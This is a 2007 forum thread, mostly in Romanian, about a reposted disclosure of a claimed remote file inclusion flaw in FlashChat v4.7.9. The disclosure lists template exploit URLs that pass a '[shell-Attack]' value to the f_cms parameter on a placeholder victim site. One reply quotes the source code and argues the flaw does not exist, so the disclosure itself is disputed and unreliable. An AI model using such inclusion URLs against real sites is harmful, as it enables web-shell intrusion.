Gonzalez Posted May 28, 2007 Report Share Posted May 28, 2007 Discovered By Hasadya RaedContact : RaeD (at) BsdMail (dot) Com [email concealed]--------------------------Script : FlashChat_v479Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html--------------------------B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); --------------------------Exploits : http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack]http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack] Quote Link to comment Share on other sites More sharing options...
kw3rln Posted May 28, 2007 Report Share Posted May 28, 2007 Discovered By Hasadya RaedContact : RaeD (at) BsdMail (dot) Com [email concealed]--------------------------Script : FlashChat_v479Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html--------------------------B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); --------------------------Exploits : http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack]http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]codul:in common.php//if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS') { //---CMS $f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php'; if( !file_exists($f_cms) || !is_file($f_cms) ) require_once(INC_DIR . 'cmses/statelessCMS.php');//free for all users else require_once( $f_cms ); //---end CMS } f_cms ii declarat !nu-i vurnerabil iar in connection.php nu exista variabila aia : Quote Link to comment Share on other sites More sharing options...
Guest flama Posted May 28, 2007 Report Share Posted May 28, 2007 poate ai downloadat versiunea patchuita .... pe de alta parte poate omu care a facut disclose la ea e un complete idiot Quote Link to comment Share on other sites More sharing options...
kw3rln Posted May 29, 2007 Report Share Posted May 29, 2007 poate ai downloadat versiunea patchuita .... pe de alta parte poate omu care a facut disclose la ea e un complete idiot am luat versiunea care o puso omu!Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html Quote Link to comment Share on other sites More sharing options...
